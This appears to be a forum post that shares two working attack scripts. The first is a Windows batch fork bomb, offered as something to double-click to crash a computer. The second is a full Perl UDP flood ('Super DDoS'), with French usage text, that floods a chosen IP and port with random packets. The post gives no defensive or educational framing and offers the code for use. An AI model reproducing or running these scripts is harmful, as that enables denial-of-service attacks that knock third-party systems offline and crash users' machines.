Jump to content

Recommended Posts

Posted

Double click it and it will Crash the computer.

@echo off

:a

Start

Start

Start

Start

Start

Start

Start

Start

goto :a

 

ddos perl

 

    #!/usr/bin/perl

   

    ##############

    # udp flood.

    ##############

   

    use Socket;

    use strict;

   

    if ($#ARGV != 3) {

      print " \n";

      print "Super DDoS // by Adrien\n\n";

      print "Commande: flood.pl <ip> <port> <packets> <temps(en secondes)>\n";

      print " port: le port à flood. Mettez 0 pour tous.\n";

      print " packets: le nombre de packets à envoyer. Entre 64 et 1024.\n";

      print " temps: le temps de flood en secondes.\n";

      exit(1);

    }

   

    my ($ip,$port,$size,$time) = @ARGV;

   

    my ($iaddr,$endtime,$psize,$pport);

   

    $iaddr = inet_aton("$ip") or die "Impossible de se connecter à $ip\n";

    $endtime = time() + ($time ? $time : 1000000);

   

    socket(flood, PF_INET, SOCK_DGRAM, 17);

   

   

    print "Flooding en cours sur $ip avec le port " . ($port ? $port : "random") . ", envoit de " .

      ($size ? "$size-byte" : "random size") . " packets" .

      ($time ? " pour $time secondes" : "") . "\n";

    print "Attaque arrêtée avec Ctrl-C\n" unless $time;

   

    for (;time() <= $endtime;) {

      $psize = $size ? $size : int(rand(1500-64)+64) ;

      $pport = $port ? $port : int(rand(65500))+1;

   

      send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

 

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


×
×
  • Create New...

AdBlock Extension Detected!

Our website is made possible by displaying online advertisements to our members.

Please disable AdBlock browser extension first, to be able to use our community.

I've Disabled AdBlock